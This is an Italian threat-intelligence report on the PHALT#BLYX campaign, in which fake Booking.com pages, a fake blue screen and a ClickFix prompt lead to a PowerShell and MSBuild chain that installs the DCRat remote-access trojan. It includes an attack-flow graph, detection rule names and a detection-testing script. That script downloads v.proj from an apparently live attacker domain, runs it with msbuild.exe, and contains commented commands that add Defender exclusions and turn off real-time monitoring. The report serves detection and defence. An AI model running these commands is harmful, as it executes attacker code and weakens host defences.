Segui
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il report dettagli un’intrusione a più fasi che colpisce il settore dell’ospitalità combinando una pagina di destinazione falsa di Booking.com, un’animazione fuorviante in stile schermata blu e un prompt in stile ClickFix per persuadere gli utenti a eseguire un dropper PowerShell. Quel dropper recupera un file di progetto MSBuild, che esegue un loader DCRat su misura. Il loader altera Windows Defender, imposta la persistenza utilizzando un collegamento .url di avvio e inietta il suo payload in processi legittimi. Sfruttando utilità di living-off-the-land come PowerShell e MSBuild.exe, gli operatori riducono evidenti tracce di malware. Sono anche notati artefatti in lingua russa nella catena come indizio di attribuzione.
Investigazione
I ricercatori di Securonix hanno mappato il flusso da email di phishing che offrono link di “cancellazione prenotazione” a un dominio malevolo, poi a un one-liner PowerShell che individua msbuild.exe, scarica un file v.proj e lo esegue. Il progetto v.proj esegue diverse azioni: aggiunge esclusioni di Windows Defender, scarica staxs.exe (una variante di DCRat), crea un collegamento .url di Avvio per la persistenza e si collega all’infrastruttura di comando e controllo sulla porta 3535. Il loader quindi comprime e inietta la fase finale in aspnet_compiler.exe, usando l’hollowing dei processi per confondersi con attività legittime.
Mitigazione
Ridurre l’esposizione addestrando gli utenti a riconoscere i prompt in stile ClickFix e il social engineering “esegui questo comando per risolvere”. Monitorare e limitare l’esecuzione di MSBuild.exe, specialmente quando invocata da percorsi insoliti o workflow guidati dall’utente e abilitare il logging dei blocchi script di PowerShell per maggiore visibilità. Aggiungere rilevamenti per la creazione di collegamenti .url nella cartella Avvio e per modifiche alle esclusioni di Windows Defender. A livello di rete, bloccare il traffico in uscita verso i domini malevoli identificati e limitare esplicitamente o avvisare su egress sospetti verso TCP/3535 dove non richiesto.
Risposta
Se viene rilevata attività, isolare il host e preservare i principali artefatti inclusi v.proj, staxs.exe e qualsiasi file .url di Avvio. Rimuovere esclusioni non autorizzate di Defender, terminare processi malevoli o iniettati e bloccare i domini/IP C2 associati, in particolare qualsiasi comunicazione sulla porta 3535. Resettare eventuali credenziali esposte, eseguire una scansione completa di malware e esaminare l’ambiente per schemi di esecuzione guidati da MSBuild e comandi PowerShell simili. Infine, implementare rilevamenti informati da intelligence sulle minacce che si concentrano sull’abuso di MSBuild, sul comportamento ClickFix e sulla persistenza tramite scorciatoie di Avvio per prevenire recidive.
“graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef file fill:#e6e6e6 classDef folder fill:#d9ead3 %% Nodes u2013 Actions action_phishing[“<b>Azione</b> – <b>T1566.002 Spearphishing Link</b><br/><b>Descrizione</b>: La vittima riceve un’email che sembra provenire da Booking.com e clicca un link malevolo verso un sito di prenotazioni falso.”] class action_phishing action action_user_execution[“<b>Azione</b> – <b>T1204.001 Esecuzione Utente</b> & <b>T1204.004 Copia&Incolla Malevola</b><br/><b>Descrizione</b>: Il sito falso mostra una pagina simile a una schermata blu della morte che dice all’utente di incollare un comando PowerShell nella finestra di dialogo Esegui.”] class action_user_execution action action_defense_evasion_exclusions[“<b>Azione</b> – <b>T1562 Riduzione delle Difese</b> & <b>T1564.012 Esclusioni File/Percorso</b><br/><b>Descrizione</b>: Lo script v.proj aggiunge esclusioni di Windows Defender per ProgramData e comuni estensioni eseguibili.”] class action_defense_evasion_exclusions action action_persistence_shortcut[“<b>Azione</b> – <b>T1547.009 Modifica Collegamento</b><br/><b>Descrizione</b>: Crea un collegamento Internet (.url) nella cartella di avvio dell’utente che punta all’eseguibile scaricato.”] class action_persistence_shortcut action action_process_hollowing[“<b>Azione</b> – <b>T1055.012 Sovrascrittura del Processo</b><br/><b>Descrizione</b>: Inietta il payload finale DCRat in aspnet_compiler.exe usando la sovrascrittura di processo.”] class action_process_hollowing action action_reflective_loading[“<b>Azione</b> – <b>T1620 Caricamento Riflessivo del Codice</b><br/><b>Descrizione</b>: Carica payload DLL aggiuntivi in modo riflessivo tramite Assembly.Load.”] class action_reflective_loading action action_c2_nonstandard_port[“<b>Azione</b> – <b>T1571 Porta Non-Standard</b><br/><b>Descrizione</b>: Il RAT comunica con i server C2 tramite la porta TCP 3535.”] class action_c2_nonstandard_port action action_c2_dynamic_resolution[“<b>Azione</b> – <b>T1568 Risoluzione Dinamica</b><br/><b>Descrizione</b>: Risolve più domini C2 (ad es., asj77.com) in fase di esecuzione.”] class action_c2_dynamic_resolution action action_obfuscation[“<b>Azione</b> – <b>T1027.005 File o Informazioni Offuscati</b><br/><b>Descrizione</b>: I payload sono pesantemente offuscati e compressi per eludere il rilevamento statico.”] class action_obfuscation action %% Nodes u2013 Tools tool_powershell[“<b>Strumento</b> – <b>T1059.001 PowerShell</b><br/><b>Descrizione</b>: Esegue il comando malevolo che scarica il file progetto MSBuild.”] class tool_powershell tool tool_msbuild[“<b>Strumento</b> – <b>T1127.001 MSBuild</b><br/><b>Descrizione</b>: Utility di sviluppo affidabile usata per compilare ed eseguire il file malevolo v.proj.”] class tool_msbuild tool tool_aspnet_compiler[“<b>Strumento</b> – aspnet_compiler.exe<br/><b>Descrizione</b>: Compilatore .NET legittimo mirato per la sovrascrittura del processo.”] class tool_aspnet_compiler process %% Nodes u2013 Malware / Files malware_vproj[“<b>Malware</b> – v.proj (progetto MSBuild malevolo)<br/><b>Descrizione</b>: Scaricato da PowerShell, compilato da MSBuild, aggiunge esclusioni ai defender e rilascia payload.”] class malware_vproj malware malware_dcrat[“<b>Malware</b> – Payload DCRat<br/><b>Descrizione</b>: Trojan di accesso remoto finale iniettato in aspnet_compiler.exe.”] class malware_dcrat malware file_shortcut[“<b>File</b> – Collegamento di Avvio (.url)<br/><b>Descrizione</b>: Punta all’eseguibile DCRat rilasciato e assicura l’auto-esecuzione al login.”] class file_shortcut file folder_startup[“<b>Cartella</b> – Directory di Avvio<br/><b>Descrizione</b>: Contiene il collegamento malevolo che provoca la persistenza.”] class folder_startup folder file_dcrat_exe[“<b>File</b> – Eseguibile DCRat Rilasciato<br/><b>Descrizione</b>: Eseguito dopo l’attivazione del collegamento.”] class file_dcrat_exe file dll_payloads[“<b>File</b> – Payload DLL Aggiuntivi<br/><b>Descrizione</b>: Caricati riflessivamente dal payload DCRat.”] class dll_payloads file port_3535[“<b>Network</b> – Porta TCP 3535<br/><b>Descrizione</b>: Usata per la comunicazione C2.”] class port_3535 file domain_asj77[“<b>Network</b> – asj77.com (dominio C2)<br/><b>Descrizione</b>: Risolto in fase di esecuzione per il comando e controllo.”] class domain_asj77 file %% Connections u2013 Flow action_phishing u002du002d>|conduce a| action_user_execution action_user_execution u002du002d>|esegue| tool_powershell tool_powershell u002du002d>|scarica| malware_vproj malware_vproj u002du002d>|compilato da| tool_msbuild tool_msbuild u002du002d>|esegue| malware_vproj malware_vproj u002du002d>|aggiunge| action_defense_evasion_exclusions action_defense_evasion_exclusions u002du002d>|crea| file_shortcut file_shortcut u002du002d>|posizionato in| folder_startup folder_startup u002du002d>|carica| file_dcrat_exe malware_vproj u002du002d>|rilasciato| file_dcrat_exe file_dcrat_exe u002du002d>|esegue| malware_dcrat malware_dcrat u002du002d>|inietta in| tool_aspnet_compiler tool_aspnet_compiler u002du002d>|sovrascritto da| malware_dcrat malware_dcrat u002du002d>|carica riflessivamente| dll_payloads malware_dcrat u002du002d>|comunica tramite| action_c2_nonstandard_port action_c2_nonstandard_port u002du002d>|usa| port_3535 malware_dcrat u002du002d>|usa risoluzione dinamica| action_c2_dynamic_resolution action_c2_dynamic_resolution u002du002d>|risolve a| domain_asj77 malware_dcrat u002du002d>|offuscato da| action_obfuscation “
Flusso di Attacco
Rilevazioni
Download o Upload tramite Powershell (tramite cmdline)
Visualizza
Modifiche Sospette alle Preferenze di Windows Defender (tramite powershell)
Visualizza
Punti di Possibile Persistenza [ASEPs – Software/Hive NTUSER] (tramite registry_event)
Visualizza
Binari / Script Sospetti in Posizione di Avvio Automatico (tramite file_event)
Visualizza
IOC (HashSha512) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (SourceIP) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (HashSha256) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (DestinationIP) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
Esecuzione di Payload Malevolo PHALT#BLYX tramite MSBuild e Process Hollowing [Creazione Processi Windows]
Visualizza
Campagna Malware PHALT#BLYX Utilizzando PowerShell e MSBuild per Infezione [Windows Powershell]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Controllo di Telemetria & Baseline Pre-Volare deve essere superato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto riflettono direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa e Comandi di Attacco:
L’attore della minaccia apre una sessione PowerShell su un endpoint compromesso. Individuano per prima cosamsbuild.exebinary, poi scaricano un progetto malevolo MSBuild (v.proj) inC:ProgramData. L’attaccante invoca immediatamentemsbuild.exeper eseguire il payload, che rilascia una seconda fase. Infine, manomettono Windows Defender aggiungendo esclusioni e disabilitando il monitoraggio in tempo reale per garantire la persistenza. -
Script di Test di Regressione:
# Script di simulazione PHALT#BLYX – riproduce attività che attivano il rilevamento # -------------------------------------------------------------- # 1. Individua msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Scarica il progetto MSBuild malevolo a ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Esegui il progetto con msbuild.exe & $msb $dest # 4. Modifica le impostazioni di Windows Defender (qualsiasi delle seguenti soddisferà la regola) # Decommenta le righe desiderate per simulare le azioni dell'attaccante. # Aggiungi percorso esclusione # Add-MpPreference -ExclusionPath "$env:ProgramData" # Aggiungi esclusione per file .exe # Add-MpPreference -ExclusionExtension ".exe" # Aggiungi esclusione per file .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Disabilita monitoraggio in tempo reale # Set-MpPreference -DisableRealtimeMonitoring $true -
Comandi di Pulizia:
# Rimuovi il file di progetto rilasciato Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Ripristina il monitoraggio in tempo reale di Windows Defender (se era stato disabilitato) Set-MpPreference -DisableRealtimeMonitoring $false # Rimuovi eventuali esclusioni aggiunte (esempio per esclusione percorso) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Opzionalmente elimina eventuali file persistenti creati dal payload # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue